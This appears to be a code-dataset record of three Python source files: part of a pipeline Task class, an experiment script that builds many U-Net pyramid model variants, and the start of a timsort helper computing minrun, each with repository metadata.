        such as `ofile5000`.

        All :class:`.TaskResourceFile` are temporary files and must be written
        to a permanent location using :func:`.Pipeline.write_output` if the output needs
        to be saved.

        Only Resources can be referred to in commands. Referencing a :class:`.Pipeline`
        or :class:`.Task` will result in an error.

        Parameters
        ----------
        command: :obj:`str`

        Returns
        -------
        :class:`.Task`
            Same task object with command appended.
        """

        def handler(match_obj):
            # Reject direct references to Task/Pipeline objects; only resources
            # may be interpolated into a command.
            groups = match_obj.groupdict()
            if groups['TASK']:
                raise PipelineException(f"found a reference to a Task object in command '{command}'.")
            if groups['PIPELINE']:
                raise PipelineException(f"found a reference to a Pipeline object in command '{command}'.")

            assert groups['RESOURCE_FILE'] or groups['RESOURCE_GROUP']
            r_uid = match_obj.group()
            r = self._pipeline._resource_map.get(r_uid)
            if r is None:
                raise PipelineException(f"undefined resource '{r_uid}' in command '{command}'.\n"
                                        f"Hint: resources must be from the same pipeline as the current task.")
            if r._source != self:
                # Resource comes from another task (or an input): record it as
                # an input and wire up the implicit dependency.
                self._add_inputs(r)
                if r._source is not None:
                    if r not in r._source._valid:
                        name = r._source._resources_inverse[r]
                        raise PipelineException(f"undefined resource '{name}'\n"
                                                f"Hint: resources must be defined within "
                                                "the task methods 'command' or 'declare_resource_group'")
                    self._dependencies.add(r._source)
                    r._source._add_internal_outputs(r)
            else:
                # First mention of one of this task's own resources makes it valid.
                _add_resource_to_set(self._valid, r)
            self._mentioned.add(r)
            return f"${{{r_uid}}}"

        from .pipeline import Pipeline  # pylint: disable=cyclic-import

        subst_command = re.sub(f"({ResourceFile._regex_pattern})|({ResourceGroup._regex_pattern})"
                               f"|({Task._regex_pattern})|({Pipeline._regex_pattern})",
                               handler,
                               command)
        self._command.append(subst_command)
        return self

    def storage(self, storage):
        """
        Set the task's storage size.

        Examples
        --------
        Set the task's disk requirements to 1 Gi:

        >>> t1 = p.new_task()
        >>> (t1.storage('1Gi')
        ...    .command(f'echo "hello"'))

        Parameters
        ----------
        storage: :obj:`str`

        Returns
        -------
        :class:`.Task`
            Same task object with storage set.
        """
        self._storage = storage
        return self

    def memory(self, memory):
        """
        Set the task's memory requirements.

        Examples
        --------
        Set the task's memory requirement to 5GB:

        >>> t1 = p.new_task()
        >>> (t1.memory(5)
        ...    .command(f'echo "hello"'))

        Parameters
        ----------
        memory: :obj:`str` or :obj:`float` or :obj:`int`
            Value is in GB.

        Returns
        -------
        :class:`.Task`
            Same task object with memory requirements set.
        """
        self._memory = memory
        return self

    def cpu(self, cores):
        """
        Set the task's CPU requirements.

        Examples
        --------
        Set the task's CPU requirement to 2 cores:

        >>> t1 = p.new_task()
        >>> (t1.cpu(2)
        ...    .command(f'echo "hello"'))

        Parameters
        ----------
        cores: :obj:`str` or :obj:`float` or :obj:`int`

        Returns
        -------
        :class:`.Task`
            Same task object with CPU requirements set.
        """
        self._cpu = cores
        return self

    def image(self, image):
        """
        Set the task's docker image.

        Examples
        --------
        Set the task's docker image to `alpine`:

        >>> t1 = p.new_task()
        >>> (t1.image('alpine:latest')
        ...    .command(f'echo "hello"'))

        Parameters
        ----------
        image: :obj:`str`
            Docker image to use.

        Returns
        -------
        :class:`.Task`
            Same task object with docker image set.
        """
        self._image = image
        return self

    def _pretty(self):
        # Single-line, tab-separated debug representation.
        s = f"Task '{self._uid}'" \
            f"\tName:\t'{self.name}'" \
            f"\tAttributes:\t'{self.attributes}'" \
            f"\tImage:\t'{self._image}'" \
            f"\tCPU:\t'{self._cpu}'" \
            f"\tMemory:\t'{self._memory}'" \
            f"\tStorage:\t'{self._storage}'" \
            f"\tCommand:\t'{self._command}'"
        return s

    def __str__(self):
        return self._uid
|
[
"daniel.zidan.king@gmail.com"
] |
daniel.zidan.king@gmail.com
|
1f4b6688675f5b730dc3dd73a877fc56530df03b
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/W_w_Mgt_to_C_focus_div/ch032/Tcrop_s255_p20_j15/pyr_6s/L3/step09_6side_L3.py
|
bb36cd8c779761d81788e6554c71dce596961f80
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 50,455
|
py
|
#############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
from tkinter import S  # NOTE(review): 'S' is never used below — looks like an accidental auto-import; confirm before removing.
code_exe_path = os.path.realpath(__file__) ### path of the currently executing step file
code_exe_path_element = code_exe_path.split("\\") ### split the path to find which component is kong_model2
kong_layer = code_exe_path_element.index("kong_model2") ### index of the kong_model2 component in the path
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### reconstruct the kong_model2 directory from the path prefix
import sys ### add kong_model2 to sys.path so project-absolute imports below resolve
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print("    code_exe_path:", code_exe_path)
# print("    code_exe_path_element:", code_exe_path_element)
# print("    kong_layer:", kong_layer)
# print("    kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_W_w_M_to_Cx_Cy_combine import W_w_M_to_Cx_Cy
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_W_w_M_to_Cx_Cy
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
# Generation op: tight crop (pad 20, resize to 255x255) with jit_scale=0, i.e. no jitter.
use_what_gen_op   = W_w_M_to_Cx_Cy( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale=  0) )
# Training step: same crop settings but with a nonzero jit_scale (15) — differs from the gen op only in jitter.
use_what_train_step = Train_step_W_w_M_to_Cx_Cy( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15) )

# Base hidden-channel width passed as hid_ch to every model variant defined below.
use_hid_ch = 32

import time
start_time = time.time()  # wall-clock timestamp taken when this step module starts building
###############################################################################################################################################################################################
# Naming scheme: pyramid_1side_A__2side_B__3side_C_4side_D_5sE_6sF.
# Each constant is a 7-element, symmetric per-level list ([outer, ..., center, ..., outer])
# that is passed as conv_block_num to set_unet3(...) below — it sets how many
# conv blocks each of the 7 pyramid levels gets.
##################################
### 6side1
##################################
##### 5side1
# side1, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1 = [6, 0, 0, 0, 0, 0, 6]
# side2, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 0, 0, 0, 1, 6]
pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 0, 0, 0, 2, 6]
pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 0, 0, 0, 3, 6]
pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 0, 0, 0, 4, 6]
# side3, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 1, 0, 1, 1, 6]
pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 1, 0, 1, 2, 6]
pyramid_1side_3__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 1, 0, 1, 3, 6]
pyramid_1side_3__2side_3__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 0, 2, 2, 6]
pyramid_1side_3__2side_3__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 0, 2, 3, 6]
pyramid_1side_3__2side_3__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 0, 3, 3, 6]
pyramid_1side_3__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 1, 0, 1, 4, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 0, 2, 4, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 0, 3, 4, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 0, 4, 4, 6]
# side4, 1 3 6 "10" 15 21 28 36 45 55, 20
pyramid_1side_4__2side_1__3side_1_4side_1_5s1_6s1 = [6, 1, 1, 1, 1, 1, 6]
pyramid_1side_4__2side_2__3side_1_4side_1_5s1_6s1 = [6, 2, 1, 1, 1, 2, 6]
pyramid_1side_4__2side_2__3side_2_4side_1_5s1_6s1 = [6, 3, 1, 1, 1, 3, 6]
pyramid_1side_4__2side_3__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 1, 2, 2, 6]
pyramid_1side_4__2side_3__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 1, 2, 3, 6]
pyramid_1side_4__2side_3__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 1, 3, 3, 6]
pyramid_1side_4__2side_4__3side_1_4side_1_5s1_6s1 = [6, 2, 2, 2, 2, 2, 6]
pyramid_1side_4__2side_4__3side_2_4side_1_5s1_6s1 = [6, 3, 2, 2, 2, 3, 6]
pyramid_1side_4__2side_4__3side_3_4side_1_5s1_6s1 = [6, 3, 3, 2, 3, 3, 6]
pyramid_1side_4__2side_4__3side_4_4side_1_5s1_6s1 = [6, 3, 3, 3, 3, 3, 6]
pyramid_1side_4__2side_2__3side_2_4side_2_5s1_6s1 = [6, 4, 1, 1, 1, 4, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 1, 2, 4, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 1, 3, 4, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s1_6s1 = [6, 4, 2, 2, 2, 4, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s1_6s1 = [6, 4, 3, 2, 3, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s1_6s1 = [6, 4, 3, 3, 3, 4, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 1, 4, 4, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s1_6s1 = [6, 4, 4, 2, 4, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s1_6s1 = [6, 4, 4, 3, 4, 4, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s1_6s1 = [6, 4, 4, 4, 4, 4, 6]

##### 5side2
# side2, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 0, 0, 0, 5, 6]
# side3, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 1, 0, 1, 5, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 0, 2, 5, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 0, 3, 5, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 0, 4, 5, 6]
# side4, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s1 = [6, 5, 1, 1, 1, 5, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 1, 2, 5, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 1, 3, 5, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s1 = [6, 5, 2, 2, 2, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s1 = [6, 5, 3, 2, 3, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s1 = [6, 5, 3, 3, 3, 5, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 1, 4, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s1 = [6, 5, 4, 2, 4, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s1 = [6, 5, 4, 3, 4, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s1 = [6, 5, 4, 4, 4, 5, 6]

##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 0, 5, 5, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 1, 5, 5, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s1 = [6, 5, 5, 2, 5, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s1 = [6, 5, 5, 3, 5, 5, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s1 = [6, 5, 5, 4, 5, 5, 6]

##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s1 = [6, 5, 5, 5, 5, 5, 6]

##################################
### 6side2
##################################
##### 5side2
# side2, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 0, 0, 0, 6, 6]
# side3, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_3__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 1, 0, 1, 6, 6]
pyramid_1side_3__2side_3__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 0, 2, 6, 6]
pyramid_1side_3__2side_3__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 0, 3, 6, 6]
pyramid_1side_3__2side_3__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 0, 4, 6, 6]
# side4, 1 3 "6" 10 15 21 28 36 45 55, 10
pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s2 = [6, 6, 1, 1, 1, 6, 6]
pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 1, 2, 6, 6]
pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 1, 3, 6, 6]
pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s2 = [6, 6, 2, 2, 2, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s2 = [6, 6, 3, 2, 3, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s2 = [6, 6, 3, 3, 3, 6, 6]
pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 1, 4, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s2 = [6, 6, 4, 2, 4, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s2 = [6, 6, 4, 3, 4, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s2 = [6, 6, 4, 4, 4, 6, 6]

##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 0, 5, 6, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 1, 5, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s2 = [6, 6, 5, 2, 5, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s2 = [6, 6, 5, 3, 5, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s2 = [6, 6, 5, 4, 5, 6, 6]

##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s2 = [6, 6, 5, 5, 5, 6, 6]

##################################
### 6side3
##################################
##### 5side3
# side3, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_3__2side_3__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 0, 6, 6, 6]
# side4, 1 "3" 6 10 15 21 28 36 45 55, 4
pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 1, 6, 6, 6]
pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s3 = [6, 6, 6, 2, 6, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s3 = [6, 6, 6, 3, 6, 6, 6]
pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s3 = [6, 6, 6, 4, 6, 6, 6]

##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s3 = [6, 6, 6, 5, 6, 6, 6]

##################################
### 6side4
##################################
##### 5side4
# side4, "1" 3 6 10 15 21 28 36 45 55, 1
pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s4 = [6, 6, 6, 6, 6, 6, 6]
###############################################################################################################################################################################################
###############################################################################################################################################################################################
###############################################################################################################################################################################################
###################
############# 1s1
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###################
############# 1s2
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_2__2side_2__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###################
############# 1s3
######### 2s1
##### 3s1
### 4s1
ch032_pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s2
##### 3s1
### 4s1
ch032_pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_3__2side_2__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
# --- ch032 pyramid model builders -------------------------------------------
# Every builder below shared exactly the same KModel_builder configuration;
# the only thing that varied was the conv-block layout (pyramid_<spec>).
# They were originally ~76 copy-pasted one-liners; they are now generated
# from a list of spec suffixes.  The resulting module-level names
# (ch032_pyramid_<spec>) are identical to before, so importers are unaffected.

def _build_ch032_pyramid(conv_block_num):
    """Build one ch032 flow_unet2 KModel_builder with the shared settings.

    conv_block_num: the pyramid layout (conv blocks per U-Net level),
    i.e. one of the pyramid_<spec> lists defined earlier in this module.
    """
    return (KModel_builder()
            .set_model_name(MODEL_NAME.flow_unet2)
            .set_unet3(out_conv_block=True, concat_before_down=True,
                       kernel_size=3, padding="valid", hid_ch=use_hid_ch,
                       depth_level=3, out_ch=1, d_amount=2, bottle_divide=True,
                       unet_acti="sigmoid", conv_block_num=conv_block_num,
                       ch_upper_bound=2 ** 14)
            .set_gen_op(use_what_gen_op)
            .set_train_step(use_what_train_step))

# Spec suffixes.  For each entry, the layout ``pyramid_<spec>`` (defined
# earlier in this module) is looked up and ``ch032_pyramid_<spec>`` is
# created at module level.
_CH032_PYRAMID_SPECS = [
    # 1s3 / 2s2 / 3s2 / 4s1..4s2
    "1side_3__2side_2__3side_2_4side_1_5s1_6s1",
    "1side_3__2side_2__3side_2_4side_2_5s1_6s1",
    "1side_3__2side_2__3side_2_4side_2_5s2_6s1",
    "1side_3__2side_2__3side_2_4side_2_5s2_6s2",
    # 1s3 / 2s3
    "1side_3__2side_3__3side_1_4side_1_5s1_6s1",
    "1side_3__2side_3__3side_2_4side_1_5s1_6s1",
    "1side_3__2side_3__3side_2_4side_2_5s1_6s1",
    "1side_3__2side_3__3side_2_4side_2_5s2_6s1",
    "1side_3__2side_3__3side_2_4side_2_5s2_6s2",
    "1side_3__2side_3__3side_3_4side_1_5s1_6s1",
    "1side_3__2side_3__3side_3_4side_2_5s1_6s1",
    "1side_3__2side_3__3side_3_4side_2_5s2_6s1",
    "1side_3__2side_3__3side_3_4side_2_5s2_6s2",
    "1side_3__2side_3__3side_3_4side_3_5s1_6s1",
    "1side_3__2side_3__3side_3_4side_3_5s2_6s1",
    "1side_3__2side_3__3side_3_4side_3_5s2_6s2",
    "1side_3__2side_3__3side_3_4side_3_5s3_6s1",
    "1side_3__2side_3__3side_3_4side_3_5s3_6s2",
    "1side_3__2side_3__3side_3_4side_3_5s3_6s3",
    # 1s4 / 2s1
    "1side_4__2side_1__3side_1_4side_1_5s1_6s1",
    # 1s4 / 2s2
    "1side_4__2side_2__3side_1_4side_1_5s1_6s1",
    "1side_4__2side_2__3side_2_4side_1_5s1_6s1",
    "1side_4__2side_2__3side_2_4side_2_5s1_6s1",
    "1side_4__2side_2__3side_2_4side_2_5s2_6s1",
    "1side_4__2side_2__3side_2_4side_2_5s2_6s2",
    # 1s4 / 2s3
    "1side_4__2side_3__3side_1_4side_1_5s1_6s1",
    "1side_4__2side_3__3side_2_4side_1_5s1_6s1",
    "1side_4__2side_3__3side_2_4side_2_5s1_6s1",
    "1side_4__2side_3__3side_2_4side_2_5s2_6s1",
    "1side_4__2side_3__3side_2_4side_2_5s2_6s2",
    "1side_4__2side_3__3side_3_4side_1_5s1_6s1",
    "1side_4__2side_3__3side_3_4side_2_5s1_6s1",
    "1side_4__2side_3__3side_3_4side_2_5s2_6s1",
    "1side_4__2side_3__3side_3_4side_2_5s2_6s2",
    "1side_4__2side_3__3side_3_4side_3_5s1_6s1",
    "1side_4__2side_3__3side_3_4side_3_5s2_6s1",
    "1side_4__2side_3__3side_3_4side_3_5s2_6s2",
    "1side_4__2side_3__3side_3_4side_3_5s3_6s1",
    "1side_4__2side_3__3side_3_4side_3_5s3_6s2",
    "1side_4__2side_3__3side_3_4side_3_5s3_6s3",
    # 1s4 / 2s4
    "1side_4__2side_4__3side_1_4side_1_5s1_6s1",
    "1side_4__2side_4__3side_2_4side_1_5s1_6s1",
    "1side_4__2side_4__3side_2_4side_2_5s1_6s1",
    "1side_4__2side_4__3side_2_4side_2_5s2_6s1",
    "1side_4__2side_4__3side_2_4side_2_5s2_6s2",
    "1side_4__2side_4__3side_3_4side_1_5s1_6s1",
    "1side_4__2side_4__3side_3_4side_2_5s1_6s1",
    "1side_4__2side_4__3side_3_4side_2_5s2_6s1",
    "1side_4__2side_4__3side_3_4side_2_5s2_6s2",
    "1side_4__2side_4__3side_3_4side_3_5s1_6s1",
    "1side_4__2side_4__3side_3_4side_3_5s2_6s1",
    "1side_4__2side_4__3side_3_4side_3_5s2_6s2",
    "1side_4__2side_4__3side_3_4side_3_5s3_6s1",
    "1side_4__2side_4__3side_3_4side_3_5s3_6s2",
    "1side_4__2side_4__3side_3_4side_3_5s3_6s3",
    "1side_4__2side_4__3side_4_4side_1_5s1_6s1",
    "1side_4__2side_4__3side_4_4side_2_5s1_6s1",
    "1side_4__2side_4__3side_4_4side_2_5s2_6s1",
    "1side_4__2side_4__3side_4_4side_2_5s2_6s2",
    "1side_4__2side_4__3side_4_4side_3_5s1_6s1",
    "1side_4__2side_4__3side_4_4side_3_5s2_6s1",
    "1side_4__2side_4__3side_4_4side_3_5s2_6s2",
    "1side_4__2side_4__3side_4_4side_3_5s3_6s1",
    "1side_4__2side_4__3side_4_4side_3_5s3_6s2",
    "1side_4__2side_4__3side_4_4side_3_5s3_6s3",
    "1side_4__2side_4__3side_4_4side_4_5s1_6s1",
    "1side_4__2side_4__3side_4_4side_4_5s2_6s1",
    "1side_4__2side_4__3side_4_4side_4_5s2_6s2",
    "1side_4__2side_4__3side_4_4side_4_5s3_6s1",
    "1side_4__2side_4__3side_4_4side_4_5s3_6s2",
    "1side_4__2side_4__3side_4_4side_4_5s3_6s3",
    "1side_4__2side_4__3side_4_4side_4_5s4_6s1",
    "1side_4__2side_4__3side_4_4side_4_5s4_6s2",
    "1side_4__2side_4__3side_4_4side_4_5s4_6s3",
    "1side_4__2side_4__3side_4_4side_4_5s4_6s4",
]

for _spec in _CH032_PYRAMID_SPECS:
    globals()["ch032_pyramid_" + _spec] = _build_ch032_pyramid(globals()["pyramid_" + _spec])
del _spec
###############################################################################################################################################################################################
###############################################################################################################################################################################################
if __name__ == "__main__":
    # Smoke test: build the smallest pyramid variant, push one dummy image
    # through the generator, then dump weights, a summary and the describe
    # string.  Runs only when this module is executed directly.
    import numpy as np
    print("build_model cost time:", time.time() - start_time)
    dummy_img = np.zeros(shape=(1, 512, 512, 1), dtype=np.float32)
    built_model = ch032_pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1.build()
    flow = built_model.generator(dummy_img)
    print(flow[0].shape)
    from kong_util.tf_model_util import Show_model_weights
    Show_model_weights(built_model.generator)
    built_model.generator.summary()
    print(built_model.model_describe)
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
55143682fca9a5a372684fe6877e0b9819391f5a
|
b83ce8d7edc345c8db38902d08c9b3b6f1ef054c
|
/new_timsort.py
|
1536f80a958be00f7c4705a437c94509544f8037
|
[] |
no_license
|
OlegLaiok/cs102
|
2078e9ee1b3fb766a49f93c1817ed550c272d7f7
|
76d2b6a5ebb88b0a5825c3a2f375c8be38cc5637
|
refs/heads/master
| 2020-08-06T00:02:00.689435
| 2020-06-27T13:40:56
| 2020-06-27T13:40:56
| 212,763,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
import random
def GetMinrun(n: int):
    """Compute timsort's minrun: shift n down until it is below 64, and add 1
    if any of the shifted-out bits was set (CPython's minrun heuristic)."""
    leftover = 0  # becomes 1 if any shifted-out bit was non-zero
    while n >= 64:
        leftover |= n & 1
        n >>= 1
    return n + leftover
